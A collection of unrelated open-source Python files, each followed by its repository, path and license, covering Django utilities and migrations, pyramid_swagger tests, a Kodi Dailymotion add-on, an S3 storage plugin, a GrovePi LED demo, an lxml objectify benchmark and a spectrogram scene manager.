set_as_admin=set_as_admin,
)
course_roles.update_organization_staff_roles(
user=user,
organization_short_name=organization_short_name,
set_as_organization_staff=set_as_organization_staff,
)
| appsembler/edx-platform | openedx/core/djangoapps/appsembler/auth/tahoe_auth0_pipeline.py | Python | agpl-3.0 | 1,624 |
# -*- coding: utf-8 -*-
#------------------------------------------------------------
# beta.1 Dailymotion
# Version 0.1 (10.12.2014)
#------------------------------------------------------------
# License: GPL (http://www.gnu.org/licenses/gpl-3.0.html)
# Gracias a la librería plugintools de Jesús (www.mimediacenter.info)
import os
import sys
import urllib
import urllib2
import re
import shutil
import zipfile
import time
import xbmc
import xbmcgui
import xbmcaddon
import xbmcplugin
import plugintools
import json
import math
home = xbmc.translatePath(os.path.join('special://home/addons/plugin.video.arena+/', ''))
tools = xbmc.translatePath(os.path.join('special://home/addons/plugin.video.arena+/resources/tools', ''))
addons = xbmc.translatePath(os.path.join('special://home/addons/', ''))
resources = xbmc.translatePath(os.path.join('special://home/addons/plugin.video.arena+/resources', ''))
art = xbmc.translatePath(os.path.join('special://home/addons/plugin.video.arena+/art', ''))
tmp = xbmc.translatePath(os.path.join('special://home/addons/plugin.video.arena+/tmp', ''))
playlists = xbmc.translatePath(os.path.join('special://home/addons/playlists', ''))
icon = art + 'icon.png'
fanart = 'fanart.jpg'
def dailym_getplaylist(url):
plugintools.log("beta.1.dailymotion_playlists "+url)
# Fetch video list from Dailymotion playlist user
data = plugintools.read(url)
#plugintools.log("data= "+data)
# Extract items from feed
pattern = ""
matches = plugintools.find_multiple_matches(data,'{"(.*?)}')
pattern = '{"(.*?)},{'
for entry in matches:
plugintools.log("entry="+entry)
title = plugintools.find_single_match(entry,'name":"(.*?)"')
title = title.replace("\u00e9" , "é")
title = title.replace("\u00e8" , "è")
title = title.replace("\u00ea" , "ê")
title = title.replace("\u00e0" , "à")
plugintools.log("title= "+title)
id_playlist = plugintools.find_single_match(entry,'id":"(.*?)",')
if id_playlist:
plugintools.log("id_playlist= "+id_playlist)
return id_playlist
def dailym_getvideo(url):
plugintools.log("beta.1.dailymotion_videos "+url)
# Fetch video list from Dailymotion feed
data = plugintools.read(url)
#plugintools.log("data= "+data)
# Extract items from feed
pattern = ""
matches = plugintools.find_multiple_matches(data,'{"(.*?)}')
pattern = '{"(.*?)},{'
for entry in matches:
plugintools.log("entry= "+entry)
# Not the better way to parse XML, but clean and easy
title = plugintools.find_single_match(entry,'title":"(.*?)"')
title = title.replace("\u00e9" , "é")
title = title.replace("\u00e8" , "è")
title = title.replace("\u00ea" , "ê")
title = title.replace("\u00e0" , "à")
video_id = plugintools.find_single_match(entry,'id":"(.*?)",')
if video_id:
plugintools.log("video_id= "+video_id)
return video_id
def dailym_pl(params):
plugintools.log("dailym_pl "+repr(params))
pl = params.get("url")
data = plugintools.read(pl)
plugintools.log("playlist= "+data)
dailym_vid = plugintools.find_multiple_matches(data, '{(.*?)}')
for entry in dailym_vid:
plugintools.log("entry= "+entry)
title = plugintools.find_single_match(entry, '"title":"(.*?)",')
title = title.replace('"', "")
title = title.replace('\*', "")
video_id = plugintools.find_single_match(entry, '"id":"(.*?)",')
thumbnail = "https://api.dailymotion.com/thumbnail/video/"+video_id+""
if thumbnail == "":
thumbnail = 'http://image-parcours.copainsdavant.com/image/750/1925508253/4094834.jpg'
url = "plugin://plugin.video.dailymotion_com/?url="+video_id+"&mode=playVideo"
print 'url',url
plugintools.add_item(action="play", title=title, url=url, folder = False, fanart='http://image-parcours.copainsdavant.com/image/750/1925508253/4094834.jpg',thumbnail=thumbnail,isPlayable = True)
| iptvgratis/TUPLAY | resources/tools/dailymotion.py | Python | gpl-3.0 | 4,151 |
"""
Menu utilities.
"""
import types
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.utils.importlib import import_module
from django.core.urlresolvers import reverse
def _get_menu_cls(menu_cls, context):
if type(menu_cls) is types.DictType:
curr_url = context.get('request').META['PATH_INFO']
for key in menu_cls:
admin_site_mod, admin_site_inst = key.rsplit('.', 1)
admin_site_mod = import_module(admin_site_mod)
admin_site = getattr(admin_site_mod, admin_site_inst)
admin_url = reverse('%s:index' % admin_site.name) # FIXME use current_app to reverse custom AdminSite!
if curr_url.startswith(admin_url):
mod, inst = menu_cls[key].rsplit('.', 1)
mod = import_module(mod)
return getattr(mod, inst)
else:
mod, inst = menu_cls.rsplit('.', 1)
mod = import_module(mod)
return getattr(mod, inst)
raise ValueError('Dashboard menu matching "%s" not found' % menu_cls)
def get_admin_menu(context):
"""
Returns the admin menu defined by the user or the default one.
"""
return _get_menu_cls(getattr(
settings,
'ADMIN_TOOLS_MENU',
'admin_tools.menu.DefaultMenu'
), context)()
| liberation/django-admin-tools | admin_tools/menu/utils.py | Python | mit | 1,331 |
from bravado_core.spec import Spec
import mock
from pyramid.config import Configurator
from pyramid.registry import Registry
import pytest
from swagger_spec_validator.common import SwaggerValidationError
import pyramid_swagger
from pyramid_swagger.model import SwaggerSchema
@mock.patch('pyramid_swagger.register_api_doc_endpoints')
@mock.patch('pyramid_swagger.get_swagger_schema')
@mock.patch('pyramid_swagger.get_swagger_spec')
def test_disable_api_doc_views(_1, _2, mock_register):
settings = {
'pyramid_swagger.enable_api_doc_views': False,
'pyramid_swagger.enable_swagger_spec_validation': False,
}
mock_config = mock.Mock(
spec=Configurator,
registry=mock.Mock(spec=Registry, settings=settings))
pyramid_swagger.includeme(mock_config)
assert not mock_register.called
def test_bad_schema_validated_on_include():
settings = {
'pyramid_swagger.schema_directory': 'tests/sample_schemas/bad_app/',
'pyramid_swagger.enable_swagger_spec_validation': True,
}
mock_config = mock.Mock(registry=mock.Mock(settings=settings))
with pytest.raises(SwaggerValidationError):
pyramid_swagger.includeme(mock_config)
# TODO: Figure out why this assertion fails on travis
# assert "'info' is a required property" in str(excinfo.value)
@mock.patch('pyramid_swagger.get_swagger_spec')
def test_bad_schema_not_validated_if_spec_validation_is_disabled(_):
settings = {
'pyramid_swagger.schema_directory': 'tests/sample_schemas/bad_app/',
'pyramid_swagger.enable_swagger_spec_validation': False,
}
mock_config = mock.Mock(
spec=Configurator, registry=mock.Mock(settings=settings))
pyramid_swagger.includeme(mock_config)
@mock.patch('pyramid_swagger.register_api_doc_endpoints')
def test_swagger_12_only(mock_register):
settings = {
'pyramid_swagger.schema_directory': 'tests/sample_schemas/good_app/',
'pyramid_swagger.swagger_versions': ['1.2']
}
mock_config = mock.Mock(registry=mock.Mock(settings=settings))
pyramid_swagger.includeme(mock_config)
assert isinstance(settings['pyramid_swagger.schema12'], SwaggerSchema)
assert mock_register.call_count == 1
@mock.patch('pyramid_swagger.register_api_doc_endpoints')
def test_swagger_20_only(mock_register):
settings = {
'pyramid_swagger.schema_directory': 'tests/sample_schemas/good_app/',
'pyramid_swagger.swagger_versions': ['2.0']
}
mock_config = mock.Mock(registry=mock.Mock(settings=settings))
pyramid_swagger.includeme(mock_config)
assert isinstance(settings['pyramid_swagger.schema20'], Spec)
assert not settings['pyramid_swagger.schema12']
assert mock_register.call_count == 1
@mock.patch('pyramid_swagger.register_api_doc_endpoints')
def test_swagger_12_and_20(mock_register):
settings = {
'pyramid_swagger.schema_directory': 'tests/sample_schemas/good_app/',
'pyramid_swagger.swagger_versions': ['1.2', '2.0']
}
mock_config = mock.Mock(registry=mock.Mock(settings=settings))
pyramid_swagger.includeme(mock_config)
assert isinstance(settings['pyramid_swagger.schema20'], Spec)
assert isinstance(settings['pyramid_swagger.schema12'], SwaggerSchema)
assert mock_register.call_count == 2
| analogue/pyramid_swagger | tests/includeme_test.py | Python | bsd-3-clause | 3,308 |
"""
WSGI config for dj_bookmarks project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "dj_bookmarks.settings")
application = get_wsgi_application()
| kennethlove/django_bookmarks | dj_bookmarks/dj_bookmarks/wsgi.py | Python | bsd-3-clause | 402 |
__author__ = 'tan'
import os
import boto
from boto.s3.key import Key
from juliabox.cloud import JBPluginCloud
class JBoxS3(JBPluginCloud):
provides = [JBPluginCloud.JBP_BUCKETSTORE, JBPluginCloud.JBP_BUCKETSTORE_S3]
CONN = None
BUCKETS = dict()
@staticmethod
def connect():
if JBoxS3.CONN is None:
JBoxS3.CONN = boto.connect_s3()
return JBoxS3.CONN
@staticmethod
def connect_bucket(bucket):
if bucket not in JBoxS3.BUCKETS:
JBoxS3.BUCKETS[bucket] = JBoxS3.connect().get_bucket(bucket)
return JBoxS3.BUCKETS[bucket]
@staticmethod
def push(bucket, local_file, metadata=None):
key_name = os.path.basename(local_file)
k = Key(JBoxS3.connect_bucket(bucket))
k.key = key_name
if metadata is not None:
for meta_name, meta_value in metadata.iteritems():
k.set_metadata(meta_name, meta_value)
k.set_contents_from_filename(local_file)
return k
@staticmethod
def pull(bucket, local_file, metadata_only=False):
key_name = os.path.basename(local_file)
k = JBoxS3.connect_bucket(bucket).get_key(key_name)
if (k is not None) and (not metadata_only):
k.get_contents_to_filename(local_file)
return k
@staticmethod
def delete(bucket, local_file):
key_name = os.path.basename(local_file)
k = JBoxS3.connect_bucket(bucket).delete_key(key_name)
return k
@staticmethod
def copy(from_file, to_file, from_bucket, to_bucket=None):
if to_bucket is None:
to_bucket = from_bucket
from_key_name = os.path.basename(from_file)
to_key_name = os.path.basename(to_file)
k = JBoxS3.connect_bucket(from_bucket).get_key(from_key_name)
if k is None:
return None
k_new = k.copy(to_bucket, to_key_name)
return k_new
@staticmethod
def move(from_file, to_file, from_bucket, to_bucket=None):
k_new = JBoxS3.copy(from_file, to_file, from_bucket, to_bucket)
if k_new is None:
return None
JBoxS3.delete(from_bucket, from_file)
return k_new | tanmaykm/JuliaBox | engine/src/juliabox/plugins/bucket_s3/impl_s3.py | Python | mit | 2,198 |
import asyncio
import uvloop
from aioactor.transports import NatsTransport
from aioactor.service import Service
from aioactor.broker import ServiceBroker
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
# TODO ADD possible actions list!
# TODO ADD abstractions to Message Handler!
# MessageHandler must be able to call methods of Service and control requests
# TODO Aggregate date about user [userinfo, location, photo]
class UsersService(Service):
def __init__(self):
self.name = "users"
self.actions = {
'get': self.get_user_name
}
async def get_user_name(self, user_id: int) -> dict:
users = {
1: {
'firstname': 'Antonio',
'lastname': 'Rodrigas'
}
}
user_obj = users.get(user_id, {})
return user_obj
# TODO Add protected types for registration
# TODO Add protocols accepted types for services
def register_services(broker, services):
for service in services:
broker.create_service(service())
async def main():
settings = {
'logger': 'console',
'message_transport': {
'handler': NatsTransport
}
}
broker = ServiceBroker(io_loop=loop, **settings)
services = [UsersService]
register_services(broker, services)
print(broker.available_services())
await broker.start()
if __name__ == '__main__':
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
loop.run_forever()
loop.close()
| iZonex/aioactor | examples/accounts/app.py | Python | apache-2.0 | 1,531 |
#!/usr/bin/env python
#
# GrovePi Example for using the Grove Chainable RGB LED (http://www.seeedstudio.com/wiki/Grove_-_Chainable_RGB_LED)
#
# The GrovePi connects the Raspberry Pi and Grove sensors. You can learn more about GrovePi here: http://www.dexterindustries.com/GrovePi
#
# Have a question about this example? Ask on the forums here: http://www.dexterindustries.com/forum/?forum=grovepi
#
'''
## License
The MIT License (MIT)
GrovePi for the Raspberry Pi: an open source platform for connecting Grove Sensors to the Raspberry Pi.
Copyright (C) 2015 Dexter Industries
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
'''
import time
import grovepi
# Connect first LED in Chainable RGB LED chain to digital port D7
# In: CI,DI,VCC,GND
# Out: CO,DO,VCC,GND
pin = 7
# I have 10 LEDs connected in series with the first connected to the GrovePi and the last not connected
# First LED input socket connected to GrovePi, output socket connected to second LED input and so on
numleds = 10 #If you only plug 1 LED, change 10 to 1
grovepi.pinMode(pin,"OUTPUT")
time.sleep(1)
# Chainable RGB LED methods
# grovepi.storeColor(red, green, blue)
# grovepi.chainableRgbLed_init(pin, numLeds)
# grovepi.chainableRgbLed_test(pin, numLeds, testColor)
# grovepi.chainableRgbLed_pattern(pin, pattern, whichLed)
# grovepi.chainableRgbLed_modulo(pin, offset, divisor)
# grovepi.chainableRgbLed_setLevel(pin, level, reverse)
# test colors used in grovepi.chainableRgbLed_test()
testColorBlack = 0 # 0b000 #000000
testColorBlue = 1 # 0b001 #0000FF
testColorGreen = 2 # 0b010 #00FF00
testColorCyan = 3 # 0b011 #00FFFF
testColorRed = 4 # 0b100 #FF0000
testColorMagenta = 5 # 0b101 #FF00FF
testColorYellow = 6 # 0b110 #FFFF00
testColorWhite = 7 # 0b111 #FFFFFF
# patterns used in grovepi.chainableRgbLed_pattern()
thisLedOnly = 0
allLedsExceptThis = 1
thisLedAndInwards = 2
thisLedAndOutwards = 3
try:
print "Test 1) Initialise"
# init chain of leds
grovepi.chainableRgbLed_init(pin, numleds)
time.sleep(.5)
# change color to green
grovepi.storeColor(0,255,0)
time.sleep(.5)
# set led 1 to green
grovepi.chainableRgbLed_pattern(pin, thisLedOnly, 0)
time.sleep(.5)
# change color to red
grovepi.storeColor(255,0,0)
time.sleep(.5)
# set led 10 to red
grovepi.chainableRgbLed_pattern(pin, thisLedOnly, 9)
time.sleep(.5)
# pause so you can see what happened
time.sleep(2)
# reset (all off)
grovepi.chainableRgbLed_test(pin, numleds, testColorBlack)
time.sleep(.5)
print ("Test 2a) Test Patterns - black")
# test pattern 0 - black (all off)
grovepi.chainableRgbLed_test(pin, numleds, testColorBlack)
time.sleep(1)
print ("Test 2b) Test Patterns - blue")
# test pattern 1 blue
grovepi.chainableRgbLed_test(pin, numleds, testColorBlue)
time.sleep(1)
print ("Test 2c) Test Patterns - green")
# test pattern 2 green
grovepi.chainableRgbLed_test(pin, numleds, testColorGreen)
time.sleep(1)
print ("Test 2d) Test Patterns - cyan")
# test pattern 3 cyan
grovepi.chainableRgbLed_test(pin, numleds, testColorCyan)
time.sleep(1)
print ("Test 2e) Test Patterns - red")
# test pattern 4 red
grovepi.chainableRgbLed_test(pin, numleds, testColorRed)
time.sleep(1)
print ("Test 2f) Test Patterns - magenta")
# test pattern 5 magenta
grovepi.chainableRgbLed_test(pin, numleds, testColorMagenta)
time.sleep(1)
print ("Test 2g) Test Patterns - yellow")
# test pattern 6 yellow
grovepi.chainableRgbLed_test(pin, numleds, testColorYellow)
time.sleep(1)
print ("Test 2h) Test Patterns - white")
# test pattern 7 white
grovepi.chainableRgbLed_test(pin, numleds, testColorWhite)
time.sleep(1)
# pause so you can see what happened
time.sleep(2)
# reset (all off)
grovepi.chainableRgbLed_test(pin, numleds, testColorBlack)
time.sleep(.5)
print ("Test 3a) Set using pattern - this led only")
# change color to red
grovepi.storeColor(255,0,0)
time.sleep(.5)
# set led 3 to red
grovepi.chainableRgbLed_pattern(pin, thisLedOnly, 2)
time.sleep(.5)
# pause so you can see what happened
time.sleep(2)
# reset (all off)
grovepi.chainableRgbLed_test(pin, numleds, testColorBlack)
time.sleep(.5)
print ("Test 3b) Set using pattern - all leds except this")
# change color to blue
grovepi.storeColor(0,0,255)
time.sleep(.5)
# set all leds except for 3 to blue
grovepi.chainableRgbLed_pattern(pin, allLedsExceptThis, 3)
time.sleep(.5)
# pause so you can see what happened
time.sleep(2)
# reset (all off)
grovepi.chainableRgbLed_test(pin, numleds, testColorBlack)
time.sleep(.5)
print ("Test 3c) Set using pattern - this led and inwards")
# change color to green
grovepi.storeColor(0,255,0)
time.sleep(.5)
# set leds 1-3 to green
grovepi.chainableRgbLed_pattern(pin, thisLedAndInwards, 2)
time.sleep(.5)
# pause so you can see what happened
time.sleep(2)
# reset (all off)
grovepi.chainableRgbLed_test(pin, numleds, testColorBlack)
time.sleep(.5)
print ("Test 3d) Set using pattern - this led and outwards")
# change color to green
grovepi.storeColor(0,255,0)
time.sleep(.5)
# set leds 7-10 to green
grovepi.chainableRgbLed_pattern(pin, thisLedAndOutwards, 6)
time.sleep(.5)
# pause so you can see what happened
time.sleep(2)
# reset (all off)
grovepi.chainableRgbLed_test(pin, numleds, testColorBlack)
time.sleep(.5)
print ("Test 4a) Set using modulo - all leds")
# change color to black (fully off)
grovepi.storeColor(0,0,0)
time.sleep(.5)
# set all leds black
# offset 0 means start at first led
# divisor 1 means every led
grovepi.chainableRgbLed_modulo(pin, 0, 1)
time.sleep(.5)
# change color to white (fully on)
grovepi.storeColor(255,255,255)
time.sleep(.5)
# set all leds white
grovepi.chainableRgbLed_modulo(pin, 0, 1)
time.sleep(.5)
# pause so you can see what happened
time.sleep(2)
# reset (all off)
grovepi.chainableRgbLed_test(pin, numleds, testColorBlack)
time.sleep(.5)
print ("Test 4b) Set using modulo - every 2")
# change color to red
grovepi.storeColor(255,0,0)
time.sleep(.5)
# set every 2nd led to red
grovepi.chainableRgbLed_modulo(pin, 0, 2)
time.sleep(.5)
# pause so you can see what happened
time.sleep(2)
print ("Test 4c) Set using modulo - every 2, offset 1")
# change color to green
grovepi.storeColor(0,255,0)
time.sleep(.5)
# set every 2nd led to green, offset 1
grovepi.chainableRgbLed_modulo(pin, 1, 2)
time.sleep(.5)
# pause so you can see what happened
time.sleep(2)
# reset (all off)
grovepi.chainableRgbLed_test(pin, numleds, testColorBlack)
time.sleep(.5)
print ("Test 4d) Set using modulo - every 3, offset 0")
# change color to red
grovepi.storeColor(255,0,0)
time.sleep(.5)
# set every 3nd led to red
grovepi.chainableRgbLed_modulo(pin, 0, 3)
time.sleep(.5)
# change color to green
grovepi.storeColor(0,255,0)
time.sleep(.5)
# set every 3nd led to green, offset 1
grovepi.chainableRgbLed_modulo(pin, 1, 3)
time.sleep(.5)
# change color to blue
grovepi.storeColor(0,0,255)
time.sleep(.5)
# set every 3nd led to blue, offset 2
grovepi.chainableRgbLed_modulo(pin, 2, 3)
time.sleep(.5)
# pause so you can see what happened
time.sleep(2)
# reset (all off)
grovepi.chainableRgbLed_test(pin, numleds, testColorBlack)
time.sleep(.5)
print ("Test 4e) Set using modulo - every 3, offset 1")
# change color to yellow
grovepi.storeColor(255,255,0)
time.sleep(.5)
# set every 4nd led to yellow
grovepi.chainableRgbLed_modulo(pin, 1, 3)
time.sleep(.5)
# pause so you can see what happened
time.sleep(2)
print ("Test 4f) Set using modulo - every 3, offset 2")
# change color to magenta
grovepi.storeColor(255,0,255)
time.sleep(.5)
# set every 4nd led to magenta
grovepi.chainableRgbLed_modulo(pin, 2, 3)
time.sleep(.5)
# pause so you can see what happened
time.sleep(2)
# reset (all off)
grovepi.chainableRgbLed_test(pin, numleds, testColorBlack)
time.sleep(.5)
print ("Test 5a) Set level 6")
# change color to green
grovepi.storeColor(0,255,0)
time.sleep(.5)
# set leds 1-6 to green
grovepi.write_i2c_block(0x04,[95,pin,6,0])
time.sleep(.5)
# pause so you can see what happened
time.sleep(2)
# reset (all off)
grovepi.chainableRgbLed_test(pin, numleds, testColorBlack)
time.sleep(.5)
print ("Test 5b) Set level 7 - reverse")
# change color to red
grovepi.storeColor(255,0,0)
time.sleep(.5)
# set leds 4-10 to red
grovepi.write_i2c_block(0x04,[95,pin,7,1])
time.sleep(.5)
except KeyboardInterrupt:
# reset (all off)
grovepi.chainableRgbLed_test(pin, numleds, testColorBlack)
except IOError:
print ("Error")
| gerald-yang/ubuntu-iotivity-demo | snappy/grovepi/pygrovepi/grove_chainable_rgb_led.py | Python | apache-2.0 | 10,250 |
def find_child(tag, value_to_pos, parent_value = None, child_separator = ':'):
"""
Find or create a nested PartOfSpeech and returns it.
"""
from beard import pos
chain = tag.split(child_separator, 1)
parent = chain[0]
if len(chain) > 1:
parent_val = value_to_pos.setdefault(parent, {})
return find_child(chain[1], parent_val, parent, child_separator)
else:
child = value_to_pos.setdefault(parent, pos.PartOfSpeech(parent, parent_value, 0))
value_to_pos[parent] = child
return child
def get_leaves(look_in):
"""
Find leaves in dictionary.
"""
res = []
for key, val in look_in.items():
if type(val) is dict:
res.extend(get_leaves(val))
else:
res.append(val)
return res | YuukanOO/beard | beard/swissknife.py | Python | mit | 812 |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.8 on 2017-09-14 23:53
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('organization', '0004_teacher_image'),
('courses', '0006_auto_20170914_2345'),
]
operations = [
migrations.AddField(
model_name='course',
name='teacher',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='organization.Teacher', verbose_name='\u8bb2\u5e08'),
),
]
| LennonChin/Django-Practices | MxOnline/apps/courses/migrations/0007_course_teacher.py | Python | apache-2.0 | 640 |
groups = {}
| drscream/teamvault | bundlewrap/groups.py | Python | gpl-3.0 | 12 |
from datetime import datetime
from whylog.config.filename_matchers import WildCardFilenameMatcher
from whylog.config.investigation_plan import Clue, InvestigationPlan, InvestigationStep, LineSource
from whylog.config.log_type import LogType
from whylog.config.parser_subset import ConcatenatedRegexParser
from whylog.config.parsers import RegexParser
from whylog.config.rule import Rule
from whylog.config.super_parser import RegexSuperParser
# mocked investigation plan for 003_match_time_range test
# TODO: remove mock
def mocked_investigation_plan():
super_parser = RegexSuperParser('^(\d\d\d\d-\d\d-\d\d \d\d:\d\d:\d\d).*', [1], {1: 'date'})
matcher = WildCardFilenameMatcher('localhost', 'node_1.log', 'default', super_parser)
default_log_type = LogType('default', [matcher])
cause = RegexParser(
'cause', '2015-12-03 12:08:08 root cause',
'^(\d\d\d\d-\d\d-\d\d \d\d:\d\d:\d\d) root cause$', [1], 'default', {1: 'date'}
)
effect = RegexParser(
'effect', '2015-12-03 12:08:09 visible effect',
'^(\d\d\d\d-\d\d-\d\d \d\d:\d\d:\d\d) visible effect$', [1], 'default', {1: 'date'}
)
concatenated = ConcatenatedRegexParser([cause])
effect_time = datetime(2015, 12, 3, 12, 8, 9)
search_range = {
'default': {
'date': {
'left_bound': datetime(2015, 12, 3, 12, 8, 8),
'right_bound': effect_time
}
}
}
default_investigation_step = InvestigationStep(concatenated, search_range)
rule = Rule(
[cause], effect, [
{
'clues_groups': [[1, 1], [0, 1]],
'name': 'time',
'params': {'max_delta': 1}
}
], Rule.LINKAGE_AND
) # yapf: disable
line_source = LineSource('localhost', 'node_1.log')
effect_clues = {'effect': Clue((effect_time,), 'visible effect', 40, line_source)}
return InvestigationPlan([rule], [(default_investigation_step, default_log_type)], effect_clues)
| andrzejgorski/whylog | whylog/config/mocked_investigation_plan.py | Python | bsd-3-clause | 2,019 |
"""jass URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^', include('project.jass.urls', namespace="jass")),
]
| SRGSSR/jass | project/urls.py | Python | mit | 817 |
import numpy as np
from PyQt5.QtGui import QPixmap
from PyQt5.QtWidgets import QGraphicsPixmapItem, QApplication
from urh.signalprocessing.Spectrogram import Spectrogram
from urh.ui.painting.SceneManager import SceneManager
from urh.ui.painting.SpectrogramScene import SpectrogramScene
class SpectrogramSceneManager(SceneManager):
def __init__(self, samples, parent):
super().__init__(parent)
self.samples_need_update = True
self.scene.clear()
self.spectrogram = Spectrogram(samples)
self.scene = SpectrogramScene()
@property
def num_samples(self):
return len(self.spectrogram.samples)
def set_parameters(self, samples: np.ndarray, window_size, data_min, data_max) -> bool:
"""
Return true if redraw is needed
"""
redraw_needed = False
if self.samples_need_update:
self.spectrogram.samples = samples
redraw_needed = True
self.samples_need_update = False
if window_size != self.spectrogram.window_size:
self.spectrogram.window_size = window_size
redraw_needed = True
if data_min != self.spectrogram.data_min:
self.spectrogram.data_min = data_min
redraw_needed = True
if data_max != self.spectrogram.data_max:
self.spectrogram.data_max = data_max
redraw_needed = True
return redraw_needed
def show_scene_section(self, x1: float, x2: float, subpath_ranges=None, colors=None):
pass
def update_scene_rect(self):
self.scene.setSceneRect(0, 0, self.spectrogram.time_bins, self.spectrogram.freq_bins)
def show_full_scene(self):
for item in self.scene.items():
if isinstance(item, QGraphicsPixmapItem):
self.scene.removeItem(item)
x_pos = 0
for image in self.spectrogram.create_image_segments():
item = self.scene.addPixmap(QPixmap.fromImage(image))
item.setPos(x_pos, 0)
x_pos += image.width()
QApplication.instance().processEvents()
# Estimated time_bins from update_scene_rect may be too many for small signals so we update the scene rect
# after we know how wide the spectrogram actually is
self.scene.setSceneRect(0, 0, x_pos, self.spectrogram.freq_bins)
def init_scene(self):
pass
def eliminate(self):
self.spectrogram.samples = None
self.spectrogram = None
super().eliminate()
| jopohl/urh | src/urh/ui/painting/SpectrogramSceneManager.py | Python | gpl-3.0 | 2,529 |
from django.db import models
from confess.models import Post
# Create your models here.
VOTE_CHOICES=(
(+1,'+1'),
(-1,'-1'),
(0,'0'),
)
class Like (models.Model):
post = models.ForeignKey(Post)
user_token = models.CharField(max_length=100)
vote = models.SmallIntegerField(choices=VOTE_CHOICES)
date = models.DateTimeField(auto_now_add=True)
liked = models.BooleanField(default=False)
label = models.CharField(max_length=30)
class Meta:
unique_together = (('user_token', 'post'),)
def __unicode__(self):
return unicode(self.post)
| amartinez1/confessions | likes/models.py | Python | mit | 552 |
import sys, copy
from itertools import *
import benchbase
from benchbase import (with_attributes, with_text, onlylib,
serialized, children, nochange)
############################################################
# Benchmarks
############################################################
class BenchMark(benchbase.TreeBenchMark):
repeat100 = range(100)
repeat1000 = range(1000)
repeat3000 = range(3000)
def __init__(self, lib):
from lxml import etree, objectify
self.objectify = objectify
parser = etree.XMLParser(remove_blank_text=True)
lookup = objectify.ObjectifyElementClassLookup()
parser.setElementClassLookup(lookup)
super(BenchMark, self).__init__(etree, parser)
@nochange
def bench_attribute(self, root):
"1 2 4"
for i in self.repeat3000:
root.zzzzz
def bench_attribute_assign_int(self, root):
"1 2 4"
for i in self.repeat3000:
root.XYZ = 5
def bench_attribute_assign_string(self, root):
"1 2 4"
for i in self.repeat3000:
root.XYZ = "5"
@nochange
def bench_attribute_cached(self, root):
"1 2 4"
cache = root.zzzzz
for i in self.repeat3000:
root.zzzzz
@nochange
def bench_attributes_deep(self, root):
"1 2 4"
for i in self.repeat3000:
root.zzzzz['{cdefg}a00001']
@nochange
def bench_attributes_deep_cached(self, root):
"1 2 4"
cache1 = root.zzzzz
cache2 = cache1['{cdefg}a00001']
for i in self.repeat3000:
root.zzzzz['{cdefg}a00001']
@nochange
def bench_objectpath(self, root):
"1 2 4"
path = self.objectify.ObjectPath(".zzzzz")
for i in self.repeat3000:
path(root)
@nochange
def bench_objectpath_deep(self, root):
"1 2 4"
path = self.objectify.ObjectPath(".zzzzz.{cdefg}a00001")
for i in self.repeat3000:
path(root)
@nochange
def bench_objectpath_deep_cached(self, root):
"1 2 4"
cache1 = root.zzzzz
cache2 = cache1['{cdefg}a00001']
path = self.objectify.ObjectPath(".zzzzz.{cdefg}a00001")
for i in self.repeat3000:
path(root)
@with_text(text=True, utext=True, no_text=True)
def bench_annotate(self, root):
self.objectify.annotate(root)
@nochange
def bench_descendantpaths(self, root):
root.descendantpaths()
@nochange
@with_text(text=True)
def bench_type_inference(self, root):
"1 2 4"
el = root.aaaaa
for i in self.repeat1000:
el.getchildren()
@nochange
@with_text(text=True)
def bench_type_inference_annotated(self, root):
"1 2 4"
el = root.aaaaa
self.objectify.annotate(el)
for i in self.repeat1000:
el.getchildren()
@nochange
@children
def bench_elementmaker(self, children):
E = self.objectify.E
for child in children:
root = E.this(
"test",
E.will(
E.do("nothing"),
E.special,
)
)
if __name__ == '__main__':
benchbase.main(BenchMark)
| mhnatiuk/phd_sociology_of_religion | scrapper/build/lxml/benchmark/bench_objectify.py | Python | gpl-2.0 | 3,322 |
# plotwindow.py
# the main window for showing plots
# Copyright (C) 2004 Jeremy S. Sanders
# Email: Jeremy Sanders <jeremy@jeremysanders.net>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
##############################################################################
from __future__ import division
import sys
import traceback
